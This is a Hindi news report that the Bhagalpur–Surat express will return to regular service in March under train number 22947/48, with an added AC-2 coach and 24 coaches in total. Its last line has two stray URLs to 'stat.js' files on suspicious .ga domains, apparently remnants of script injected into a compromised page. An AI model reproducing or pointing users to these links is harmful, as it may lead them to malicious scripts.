रेलवे ने यात्रियों की सुविधा के लिए कुछ महत्वपूर्ण ट्रेनों को नियमित रूप से चलाने की तैयारी शुरू कर दी है। पहले फेज में भागलपुर-सूरत-दी-सप्ताहिक एक्सप्रेस को भी इसमें शामिल किया है। अभी या ट्रेन भागलपुर से सूरत के बीच स्पेशल ट्रेन बनकर चल रही है, लेकिन मार्च से यह ट्रेन पुराने नंबर से ही चलेगी। इस संबंध में परिश्रम रेलवे की ओर से नोटिफिकेशन भी जारी कर दी गई है। और जल्द ही भागलपुर की दूसरी ट्रेन को नियमित करने की योजना है।
भागलपुर सूरत एक्सप्रेस 2 मार्च से सूरत और 4 मार्च से भागलपुर से ट्रेन संख्या 22947/48 नंबर से चलेगी। लॉक डाउन के बाद से मालदा रेलवे मंडल से ट्रेन कोविड-19 स्पेशल बनकर चल रही है। भागलपुर से अभी विक्रमशिला सुपरफास्ट, फरक्का एक्सप्रेस, जमालपुर हावड़ा , अगरतला देवघर, एक्सप्रेस और सूरत भागलपुर, सहित साहिबगंज की ऑल जमालपुर मेमो पैसेंजर को स्पेशल बना कर चलाया जा रहा है।
कोरोना के कारण सभी ट्रेनों को स्पेशल बना कर चलाया जा रहा है इन ट्रेनों के नंबर के आगे 0 लगा हुआ है। ट्रेन के नियमित होने से भागलपुर के अलावा मुंगेर और लखीसराय और पटना जिले के यात्रियों को अधिक राहत मिलेगी। भागलपुर सूरत एक्सप्रेस में पहली बार एसी-टू के कोच भी होंगे अभी तक इसमें केवल एसी-थ्री स्लीपर और जनरल क्लास की बोगियां लगी हुई थी।
एसी-टू के कोच लगने से लोगों को बहुत अधिक फायदा होगा। सूरत भागलपुर में एसी-2 एक, ऐसी-3 पांच, स्लीपर 11, जनरल 4 और एसएलआर मिलाकर कुल 24 कोच होंगे। ट्रेन का निरंतर परिचालन होने से लोगों को काफी राहत मिलेगी सबसे अधिक राहत कपड़ा व्यापारियों को मिलेगी क्योंकि सूरत से यहां कपड़ों का कारोबार बहुत अधिक होता है। भागलपुर के अलावा नवगछिया, पूर्णिया झारखंड और बांका जिले से भी व्यवसायी इससे सफर करते हैं और कपड़े भी बुक कर कर मंगवाते हैं।
इनमें कुछ प्रमुख बातें भी हैं एक कोच अब सेकंड एसी का भी होगा, 2 मार्च से सूरत से अब नियमित चलेगी ट्रेन, 4 मार्च से भागलपुर से होगी नियमित, कुल 24 कोच रहेंगे भागलपुर सूरत एक्सप्रेस में,22947/48 नंबर से ही चलेगी नए साल से।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms